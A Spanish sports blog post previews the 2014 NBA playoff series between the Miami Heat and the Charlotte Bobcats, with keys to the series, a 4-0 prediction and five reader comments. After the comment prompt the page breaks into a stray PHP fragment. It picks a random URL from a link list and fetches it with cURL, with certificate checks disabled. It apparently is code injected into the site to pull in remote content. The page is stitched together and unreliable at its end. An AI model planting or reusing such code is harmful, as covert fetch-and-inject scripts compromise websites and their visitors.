PO 2014: Previa Miami Heat – Charlotte Bobcats

19 de April de 2014 por TheDeerHunter

No es fácil ser el campeón vigente. El nivel de exigencia es constante, pero el estado físico y mental que se requiere para ganar un título no puede mantenerse también constante durante varias campañas, 82 de regular por año y playoffs completos inclusive. Las grandes dinastías siempre procuraron firmar dignas clasificaciones, pero como objetivo secundario, tratando de llegar en óptimas condiciones al momento de la verdad que es lo que realmente importa.

Los Heat afrontan la posibilidad del “threepeat” con esa mentalidad, sin duda. Otra cuestión es que ciertamente se aprecia un cierto desgaste físico y algunas piezas no terminan de encajar como antaño. Parece que no pueden permitirse alargar series como la que se avecina, a priori bastante favorable. Tratarán de salir a barrer, como ya han hecho esta temporada ante sus próximos rivales, por cierto.

Los Bobcats llegan con los deberes hechos y con cierto tufo a víctima propiciatoria. Más que digna campaña en la que han logrado defender notablemente bien, y luego Al Jefferson les ha dado la pegada suficiente. Podríamos pensar que a eso deberían aspirar ahora, pero no lo lograron ni de lejos ante Miami en los 4 choques de regular. Parecidos en ataque pero una caricatura de si mismos tratando de parar a LeBron y los suyos. Mucho nos tememos que esa va a ser la tónica.
Prácticamente nadie contempla un escenario de derrota para los Heat en esta serie. En el mejor de los casos se podrá rebañar alguna victoria puntual, pero no lo van a tener fácil.

Claves para evitar la barrida de los Bobcats:

  • Dominar los tableros, bajar el ritmo: Si los Heat tienen un punto débil ese es el rebote. Los 6 rebotes de diferencia que promedian puede no ser suficiente. Bobcats deben sellar el aro propio y cargar el ajeno todo lo posible. Todo lo que sea forzar ataques estáticos es muy bueno para ellos. Si el ritmo se vuelve alto no tienen ninguna posibilidad.
  • Equilibrio dentro/fuera: No sólo de Al Jefferson se puede vivir. Los (escasos) tiradores de Bobcats deben lograr generarle espacios, de lo contrario los Heat están más que acostumbrados a amargarle al vida al interior dominante de turno. Steve Clifford deberá encontrar el equilibrio en sus quintetos para ello. Por otro lado también será interesante ver cómo se resuelve la batalla interior/exterior entre Bosh y su par.
  • Tapar la cabeza, destapar los pies: En el improbable caso de que ese especialista defensivo de élite que se supone es Kidd-Gilchrisht logre distraer a LeBron los Bobcats deberán asegurarse de que otros hombres no les hagan un traje. En el choque que más cerca estuvieron de ganarles lograron controlar razonablemente bien a la intendencia rival.

Pronóstico: 4-0 Heat sin paliativos.

Comenta

5 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    El estado físico de Wade marcará las opciones de los Heat para conseguir el ‘Threepeat’. Bosh está jugando un año soberbio realmente, a lo mejor su mejor año desde que llegó a Miami, y sí, con la salida de Miller se complica un poco más el proyecto Heat. Spoelstra no ha acabado de dar confianza a Beasley, que tendría que haber salido de titular en bastantes más partidos, ha dado demasiadas oportunidades a Battier, un hombre que en esta etapa de su carrera debería cumplir un papel de rol secundario, y ha fundido a LeBron James en la regular, no porque le haya hecho jugar minutadas, sino porque no le ha dejado descansar en algunos tramos de la liga, ha sobreexplotado a su tótem cuando éste ha tenido problemas físicos.

    No obstante, dicho esto no conviene hacer tragedias. Es perfecta la entradilla de tu análisis, Deer. Después de tres finales y dos títulos, este año tocaba un poco esto de contemporizar para los Heat, de ir un poco al tran-tran en la regular para guardar fuerzas de cara a lo verdaderamente importante. La apuesta de Oden entrañaba ciertos riesgos, y no era un jugador sobre el que cimentar una regular perfecta. Ha habido menos efectivos y ha habido que dosificarlos como se ha podido. Esa es la sensación a priori, que el equipo adolece de algo, de la famosa profundidad de banquillo. También tienen a Ray Allen, que ha ido de menos a más en la temporada y creo que llega muy muy bien a Playoffs. Parece mentira este hombre con 39 castañacas a sus espaldas, menudo ejemplo de profesional como la copa de un pino. Es un verdadero mito. Será otra vez importante en el reto del tercer anillo de LeBron.

    Y por los Bobcats pues bueno, no estoy tan de acuerdo en que no tengan recursos para tirar, sobre todo después de la llegada de Neal, pero sí tengo muchas dudas sobre si podrán competir de alguna manera. Jefferson ha estado bastante bien arropado toda la temporada por el resto del equipo, pero se antoja una plantilla muy joven, inexperta y blandita para hacerle pupa a LeBron. Huele a barrida, y si se escapa algún partido será de casualidad.

      Citar

  2. Sancho88 dice:
    #2

    P.D: Ves? Aquí sí estoy de acuerdo con tu pronóstico. No como en el de los Raptors, yeheheiii!!

      Citar

  3. TheDeerHunter dice:
    #3

    Y por los Bobcats pues bueno, no estoy tan de acuerdo en que no tengan recursos para tirar

    Cuidado, yo no he dicho eso.
    He dicho que tienen escasos y concretos tiradores, porque tienen unos cuantos hombres importantes que no lo son en absoluto.
    Walker, Henderson, Kidd-Gildchrist, Taylor, Biyombo, Sessions, Zeller, por supuesto Jefferson… La columna vertebral no son tiradores. Lo pueden ser Neal, Tolliver, Douglas-Roberts y Gordon, pero cuidado cuando, por quién y en qué momentos metes a esta gente.

      Citar

  4. rumbero dice:
    #4

    Quitando el partido de los 61 puntacos de Lebron en los otros dieron la cara a base de esa “buena” defensa que han tenido durante toda la regular, pero acabaron perdiéndolos todos. Así que la serie debe ir por ahí y más con la experiencia de Miami. Igual sacan un partido el día que Jefferson se marque una actuación monstruosa y puedan controlar a más o menos Lebron. Más que eso sería una sorpresa

      Citar

  5. Sancho88 dice:
    #5

    Yo sí considero que Henderson es un tirador, tipo Joe Johnson. Muchos recursos técnicos, un gran 1×1 y es capaz de desatascar. Kemba es más bien… me las voy a tirar que soy el base y a veces entro en buenas rachas de anotación, y Jefferson es seguramente el pívot con más talento ofensivo de la liga. No sé, sigo viendo tres flechas anotadoras, más Neal, Douglas-Roberts, Tolliver y McRoberts que arrebaña las que puede y a veces tiene buenos días de tiro. Un equipo joven que el año que viene cuando liberen a Gordon y hagan un par de retoques, van a ser contenders del Este seguro. Tienen una gran proyección como conjunto

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>